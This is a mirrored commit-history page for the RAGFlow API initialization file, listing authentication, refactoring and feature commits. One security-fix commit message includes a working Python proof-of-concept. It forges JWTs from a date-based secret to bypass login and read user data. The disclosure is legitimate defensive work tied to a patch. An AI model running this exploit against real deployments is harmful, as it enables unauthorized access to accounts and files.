ragflow

mirror of https://github.com/infiniflow/ragflow.git synced 2026-05-21 00:36:43 +08:00

Author	SHA1	Message	Date
jony376	46897d6fa4	Fix: bind memory message `user_id` to authenticated user for JWT auth (#14745 ) ### Related issues Closes #14744 ### What problem does this PR solve? The Memory REST endpoint `POST /api/v1/messages` previously persisted whatever `user_id` the client sent in the JSON body. Memory rows were therefore attributed to an arbitrary string, even when the caller authenticated as a normal workspace user via JWT (browser/session-style bearer token decoded into an access token). That broke attribution and audit semantics for shared memories (team visibility): any authorized writer could spoof another subject id. The Python SDK already sends an optional `user_id` for integrations using API keys (`APIToken`) to tag an external subject distinct from the tenant owner user. ### Solution - Record `g.auth_via_api_token` in `_load_user` (`api/apps/__init__.py`): set `True` only when authentication resolves via `APIToken`, otherwise `False` after JWT-based login succeeds. - In `POST /messages` (`memory_api.add_message`): if the request was authenticated with an API key, keep accepting optional `user_id` from the body (default empty string). For JWT-authenticated users, always set stored `user_id` to `current_user.id` and ignore the client field. - Guard reads of `g` with `RuntimeError` handling so isolated imports or tests without a Quart application context do not fail when resolving `user_id`. - Document on `RAGFlow.add_message` that `user_id` is only meaningful for API-key authentication. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe): ### Testing - `python -m py_compile` on modified modules (`api/apps/__init__.py`, `api/apps/restful_apis/memory_api.py`). - Recommended: run web/SDK memory message tests (`test_add_message`, `test_message_routes_unit`) against a full environment with `quart` and configured services. ### Notes for reviewers - Behavior change only for callers using JWT-style authorization on `POST /messages`; API-key callers keep prior optional `user_id` semantics. Co-authored-by: jony376 <jony376@gmail.com> Co-authored-by: Cursor <cursoragent@cursor.com>	2026-05-11 13:26:05 +08:00
Mehmet Karakose	7ec87f7cb7	fix(auth): fall back to session-based auth in _load_user (#14569 ) ## Summary Closes #13663. OAuth / OIDC callbacks call `login_user(user)` which writes `_user_id` into the session cookie, but `_load_user()` in `api/apps/__init__.py` only ever looked at the `Authorization` header. The SPA's response interceptor wipes the Authorization value from `localStorage` on the first 401 it sees — meaning that during the post-redirect window after an OAuth login, a single transient 401 sends every subsequent request back to the login page even though `login_user()` had already established a perfectly good server-side session. The reporter's analysis traces this all the way through the redirect → `navigate('/')` → first request → empty header → 401 → `removeAll()` → infinite-redirect-to-login chain. ## What changed - New `_load_user_from_session()` helper that reads `session["_user_id"]`, looks up the user in `UserService` (with the same `StatusEnum.VALID` and `access_token` checks already used elsewhere), and assigns `g.user`. - Every `return None` path in `_load_user()` now routes through that helper before giving up: - missing `Authorization` header - malformed `bearer ` prefix - empty / too-short JWT payload - JWT signature failure - JWT-resolved user not found / has no `access_token` - `APIToken.query()` fallback exhausted The JWT and API-token paths still take precedence — the session is only consulted when those can't authenticate the request. So existing local-login and SDK callers see no behaviour change; only OAuth / OIDC users that hit the original race now stay logged in. The Bearer-prefix issue called out in #13663 (lines 103-110) is already handled in the current code, so this PR only addresses the second half of the report. ## Test plan - [ ] Configure OIDC under `oauth` in `service_conf.yaml` - [ ] Click the OIDC login button, complete auth at the IdP - [ ] Confirm that navigating between pages no longer bounces back to `/login` - [ ] Confirm local email/password login still issues + accepts JWTs - [ ] Confirm SDK/API key callers still authenticate via `Authorization: Bearer <api-token>` --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2026-05-11 09:59:52 +08:00
Jin Hai	1d0519d025	Fix secret key inconsistency cross the RAGFlow servers (#14591 ) ### What problem does this PR solve? A and B, two API servers and a REDIS server. If A and REDIS restart, B will hold the obsolete secret key and will lead to error. TODO: app.config['SECRET_KEY'] and app.secret_key still hold obsolete secret key. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2026-05-07 10:10:02 +08:00
Wang Qi	b684c89950	Add backward compat APIs (#14427 ) ### What problem does this PR solve? Add backward compat APIs: ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2026-04-29 15:15:49 +08:00
Lynn	655dd2f8c6	Fix: simplify _load_user (#14154 ) ### What problem does this PR solve? Simplify _load_user, remove unused fallback. ### Type of change - [x] Refactoring	2026-04-16 18:47:43 +08:00
Jin Hai	e2b879b258	Fix tiny issues (#14006 ) ### What problem does this PR solve? As title ### Type of change - [x] Refactoring <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * Chores * Improved authentication error logging to better distinguish between JWT and API token failures. * Enhanced code documentation with clarifying comments for better maintainability. <!-- end of auto-generated comment: release notes by coderabbit.ai --> Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2026-04-09 19:01:36 +08:00
qinling0210	49386bc1b5	Implement UpdateDataset and UpdateMetadata in GO (#13928 ) ### What problem does this PR solve? Implement UpdateDataset and UpdateMetadata in GO Add cli: UPDATE CHUNK <chunk_id> OF DATASET <dataset_name> SET <update_fields> REMOVE TAGS 'tag1', 'tag2' from DATASET 'dataset_name'; SET METADATA OF DOCUMENT <doc_id> TO <meta> ### Type of change - [ ] Refactoring	2026-04-07 09:44:51 +08:00
OliverW	3ed91345aa	fix(auth): return HTTP 401 for token-auth failures (#13420 ) Follow-up to #12488 #13386 ### What problem does this PR solve? Previously, token authentication failures returned HTTP 200 with an error code in the response body. This PR updates `token_required` to raise `Unauthorized` and relies on the global error handler to return a structured JSON response with HTTP 401 status. The response body structure (`code`, `message`, `data`) remains unchanged to preserve compatibility with the official SDK. Frontend logic has been updated to handle HTTP 401 responses in addition to checking `data.code`. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2026-03-06 18:18:14 +08:00
Lynn	30d5fc1a07	Refactor: split memory API into gateway and service layers (#13111 ) ### What problem does this PR solve? Decouple the memory API into a gateway layer (for routing/param parse) and a service layer (for business logic). ### Type of change - [x] Refactoring	2026-02-12 10:11:50 +08:00
6ba3i	2b20d0b3bb	Fix : Web API tests by normalizing errors, validation, and uploads (#12620 ) ### What problem does this PR solve? Fixes web API behavior mismatches that caused test failures by normalizing error responses, tightening validations, correcting error messages, and closing upload file handles. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2026-01-16 11:09:22 +08:00
6ba3i	0795616b34	Align p3 HTTP/SDK tests with current backend behavior (#12563 ) ### What problem does this PR solve? Updates pre-existing HTTP API and SDK tests to align with current backend behavior (validation errors, 404s, and schema defaults). This ensures p3 regression coverage is accurate without changing production code. ### Type of change - [x] Other (please describe): align p3 HTTP/SDK tests with current backend behavior --------- Co-authored-by: Liu An <asiro@qq.com>	2026-01-13 19:22:47 +08:00
Haiyang.Pu	6abf55c048	Feat: support openapi (#12521 ) ### What problem does this PR solve? Support OpenAPI interface description. The issue of not supporting the Swagger interface after upgrading the system framework from Flask to Quart has been resolved. Resolved https://github.com/infiniflow/ragflow/issues/5264 ### Type of change - [x] New Feature (non-breaking change which adds functionality) --------- Co-authored-by: puhaiyang <“761396462@qq.com”>	2026-01-09 17:48:20 +08:00
Lynn	bdd9f3d4d1	Fix: try handle authorization as api-token (#12462 ) ### What problem does this PR solve? Try handle authorization as api-token when jwt load failed. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2026-01-06 19:25:42 +08:00
Jin Hai	c20d112f60	Print log (#12200 ) ### What problem does this PR solve? Print invalid URL --------- Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-12-25 16:59:05 +08:00
Jin Hai	993bf7c2c8	Fix IDE warnings (#12085 ) ### What problem does this PR solve? As title ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-12-22 16:47:21 +08:00
Magicbook1108	7db9045b74	Feat: Add box connector (#11845 ) ### What problem does this PR solve? Feat: Add box connector ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-12-12 10:23:40 +08:00
Jin Hai	43f51baa96	Fix errors (#11804 ) ### What problem does this PR solve? 1. typos 2. grammar errors. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-12-08 12:21:18 +08:00
Yongteng Lei	b6c4722687	Refa: make RAGFlow more asynchronous (#11601 ) ### What problem does this PR solve? Try to make this more asynchronous. Verified in chat and agent scenarios, reducing blocking behavior. #11551, #11579. However, the impact of these changes still requires further investigation to ensure everything works as expected. ### Type of change - [x] Refactoring	2025-12-01 14:24:06 +08:00
dzikus	9a8ce9d3e2	fix: increase Quart RESPONSE_TIMEOUT and BODY_TIMEOUT for slow LLM responses (#11612 ) ### What problem does this PR solve? Quart framework has default RESPONSE_TIMEOUT and BODY_TIMEOUT of 60 seconds. This causes the frontend chat to hang exactly after 60 seconds when using slow LLM backends (e.g., Ollama on CPU, or remote APIs with high latency). This fix adds configurable timeout settings via environment variables with sensible defaults (600 seconds = 10 minutes) to match other timeout configurations in RAGFlow. Fixes issues with chat timeout when: - Using local Ollama on CPU (response time ~2 minutes) - Using remote LLM APIs with high latency - Processing complex RAG queries with many chunks ### Type of change - [X] Bug Fix (non-breaking change which fixes an issue) Co-authored-by: Grzegorz Sterniczuk <grzegorz@sternicz.uk>	2025-12-01 11:26:34 +08:00
Kevin Hu	249296e417	Feat: API supports toc_enhance. (#11437 ) ### What problem does this PR solve? Close #11433 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-11-21 14:51:58 +08:00
Kevin Hu	d1716d865a	Feat: Alter flask to Quart for async API serving. (#11275 ) ### What problem does this PR solve? #11277 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-11-18 17:05:16 +08:00
Jin Hai	70a0f081f6	Minor tweaks (#11249 ) ### What problem does this PR solve? Fix some IDE warnings ### Type of change - [x] Refactoring --------- Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-11-13 16:11:07 +08:00
Jin Hai	f98b24c9bf	Move api.settings to common.settings (#11036 ) ### What problem does this PR solve? As title ### Type of change - [x] Refactoring --------- Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-11-06 09:36:38 +08:00
Jin Hai	bab3fce136	Move some constants to common (#11004 ) ### What problem does this PR solve? As title. ### Type of change - [x] Refactoring --------- Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-11-05 08:01:39 +08:00
Billy Bao	55eb525fdc	Feat: rename file to avoid package name conflict (#10863 ) ### What problem does this PR solve? Feat: rename file to avoid package name conflict ### Type of change - [x] Refactoring	2025-10-29 12:19:57 +08:00
Jin Hai	b0b866c8fd	Refactor: move some functions out of api/utils/__init__.py (#10216 ) ### What problem does this PR solve? Refactor import modules. ### Type of change - [x] Refactoring --------- Signed-off-by: jinhai <haijin.chn@gmail.com> Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-09-25 18:04:49 +08:00
Yongteng Lei	99df0766fe	Feat: add SMTP support for user invitation emails (#9479 ) ### What problem does this PR solve? Add SMTP support for user invitation emails ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-08-15 18:12:20 +08:00
Gecko Security	de89b84661	Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998 ) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis Source (User Input): HTTP Authorization header containing attacker-controlled JWT token Flow Path: 1. Entry Point: `load_user()` function in `api/apps/__init__.py` (Line 142) 2. Token Processing: JWT token extracted from Authorization header 3. Secret Key Usage: Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. Database Query: `UserService.query()` called with decoded empty access_token 5. Sink: Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` Exploitation Steps: 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials Version: 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>	2025-06-05 12:10:24 +08:00
donblack01	115850945e	Fix:When you create a new API module named xxxa_api, the access route will become xxx instead of xxxa. For example, when I create a new API module named 'data_api', the access route will become 'dat' instead of 'data (#7325 ) ### What problem does this PR solve? Fix:When you create a new API module named xxxa_api, the access route will become xxx instead of xxxa. For example, when I create a new API module named 'data_api', the access route will become 'dat' instead of 'data' Fix:Fixed the issue where the new knowledge base would not be renamed when there was a knowledge base with the same name ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: tangyu <1@1.com> Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-05-20 09:39:26 +08:00
Kevin Hu	a6ab2c71c3	Refa: enlarge default max request body size. (#6088 ) ### What problem does this PR solve? ### Type of change - [x] Refactoring	2025-03-14 15:21:08 +08:00
hy89	7b5d831296	Fix: Starting the source code on Windows, the 'HTTP API' returns 404 (#5042 ) Fix: When starting the backend service from source code on Windows, the "HTTP API" no longer returns 404.	2025-02-17 19:33:49 +08:00
Kevin Hu	4ba4f622a5	Refactor (#4303 ) ### What problem does this PR solve? ### Type of change - [x] Refactoring	2024-12-31 14:31:31 +08:00
Jin Hai	70cd5c1599	Remove unused code (#3448 ) ### What problem does this PR solve? 1. Remove unused code. 2. Move some codes from settings to constants ### Type of change - [x] Refactoring --------- Signed-off-by: jinhai <haijin.chn@gmail.com>	2024-11-18 12:05:38 +08:00
Jin Hai	1e90a1bf36	Move settings initialization after module init phase (#3438 ) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>	2024-11-15 17:30:56 +08:00
Zhichang Yu	30f6421760	Use consistent log file names, introduced initLogger (#3403 ) ### What problem does this PR solve? Use consistent log file names, introduced initLogger ### Type of change - [ ] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [x] Refactoring - [ ] Performance Improvement - [ ] Other (please describe):	2024-11-14 17:13:48 +08:00
Zhichang Yu	a2a5631da4	Rework logging (#3358 ) Unified all log files into one. ### What problem does this PR solve? Unified all log files into one. ### Type of change - [x] Refactoring	2024-11-12 17:35:13 +08:00
Matej Horník	dd1146ec64	feat: docs for api endpoints to generate openapi specification (#3109 ) ### What problem does this PR solve? Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API. Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`	2024-11-04 15:35:36 +08:00
liuhua	cbd7cd7c4d	Refactor Dataset API (#2783 ) ### What problem does this PR solve? Refactor Dataset API ### Type of change - [x] Refactoring --------- Co-authored-by: liuhua <10215101452@stu.ecun.edu.cn>	2024-10-11 09:55:27 +08:00
Kevin Hu	863cec1bad	prepare for sdk http api (#2075 ) ### What problem does this PR solve? #1605 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2024-08-23 19:36:17 +08:00
Jin Hai	6b3a40be5c	Format file format from Windows/dos to Unix (#1949 ) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2024-08-15 09:17:36 +08:00
zhuhao	792a1a9d91	add password reset function by extending the Flask command (#1632 ) ### What problem does this PR solve? add password reset function by extending the Flask command. #1200 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2024-07-23 14:02:41 +08:00
KevinHuSh	abcd3d2469	refactor (#1124 ) ### What problem does this PR solve? ### Type of change - [x] Refactoring	2024-06-12 11:02:15 +08:00
Jin Hai	cf2f6592dd	API: create dataset (#1106 ) ### What problem does this PR solve? This PR have finished 'create dataset' of both HTTP API and Python SDK. HTTP API: ``` curl --request POST --url http://<HOST_ADDRESS>/api/v1/dataset --header 'Content-Type: application/json' --header 'Authorization: <ACCESS_KEY>' --data-binary '{ "name": "<DATASET_NAME>" }' ``` Python SDK: ``` from ragflow.ragflow import RAGFLow ragflow = RAGFLow('<ACCESS_KEY>', 'http://127.0.0.1:9380') ragflow.create_dataset("dataset1") ``` TODO: - ACCESS_KEY is the login_token when user login RAGFlow, currently. RAGFlow should have the function that user can add/delete access_key. ### Type of change - [x] New Feature (non-breaking change which adds functionality) - [x] Documentation Update --------- Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2024-06-11 11:16:37 +08:00
KevinHuSh	b8e58fe27a	add redis to accelerate access of minio (#482 ) ### What problem does this PR solve? ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2024-04-22 14:11:09 +08:00
KevinHuSh	c39b751600	conversation API backend update (#360 ) ### What problem does this PR solve? Issue link:#345 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2024-04-15 14:43:44 +08:00
wenzhuo zhan	d0ff779d3f	issue 341_Update __init__.py (#344 ) ### What problem does this PR solve? Issue link:#341 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2024-04-13 12:01:21 +08:00
KevinHuSh	91068edf16	Support Xinference (#320 ) ### What problem does this PR solve? Issue link:#299 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2024-04-11 18:22:25 +08:00
KevinHuSh	f1f09df901	add local llm implementation (#119 )	2024-03-12 11:57:08 +08:00
KevinHuSh	407b2523b6	remove unused codes, seperate layout detection out as a new api. Add new rag methed 'table' (#55 )	2024-02-05 18:08:17 +08:00
KevinHuSh	484e5abc1f	llm configuation refine and trievalTest API refine (#40 )	2024-01-19 19:51:57 +08:00

1 2

52 Commits